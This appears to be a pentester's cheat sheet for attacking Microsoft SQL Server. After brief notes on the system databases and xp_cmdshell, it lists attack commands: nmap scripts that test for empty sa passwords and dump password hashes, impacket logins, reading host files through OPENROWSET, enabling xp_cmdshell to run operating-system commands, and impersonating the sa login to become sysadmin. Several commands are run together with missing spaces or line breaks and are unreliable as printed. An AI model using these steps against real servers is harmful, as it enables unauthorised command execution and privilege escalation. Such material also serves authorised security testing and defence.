master - keeps the information for an instance of SQL Server.
msdb - used by SQL Server Agent.
model - a template database copied for each new database.
resource - a read-only database that keeps system objects visible in every database on the server in sys schema.
tempdb - keeps temporary objects for SQL queries.
xp_cmdshell:
xp_cmdshell is a powerful feature and disabled by default. It can be enabled and disabled by using the Policy-Based Management or by executing sp_configure
The Windows process spawned by xp_cmdshell has the same security rights as the SQL Server service account
xp_cmdshell operates synchronously. Control is not returned to the caller until the command-shell command is completed
Weak & default sa credentials. Admins may forget to disable this account
# Enumerate via nmapsudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <TARGET>
# Enumerate via MSFuse auxiliary/scanner/mssql/mssql_ping
set RHOSTS <TARGET>
run
### Login via Windows authimpacket-mssqlclient -windows-auth <DOMAIN>/<USER>@<TARGET>
impacket-mssqlclient <USER>:<PASSWORD>@<TARGET>
SELECT @@version;
SELECT user_name();
SELECT system_user;
SELECT IS_SRVROLEMEMBER('sysadmin'); -- 1+ is admin
# UsersSELECT name FROM master..syslogins;
# DatabasesSELECT name FROM master..sysdatabases;
# show tables ;USE <DATABASE> ;
SELECT name FROM sys.tables;
Read Files
SELECT*FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
enable_xp_cmdshell
EXECUTE sp_configure 'show advanced options', 1RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1RECONFIGURE
xp_cmdshell <COMMAND>#or run linked server command
EXECUTE('xp_cmdshell ''<DOS_CMD>''') AT [<LINKED_SERVER>]
Impersonate User
SELECTdistinct b.name FROM sys.server_permissions a INNERJOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name ='IMPERSONATE' ;
GO# Impersonating the SA UserUSE master
EXECUTEAS LOGIN ='sa'# Verify
SELECTSYSTEM_USERSELECT IS_SRVROLEMEMBER('sysadmin')
#0isNOTadmin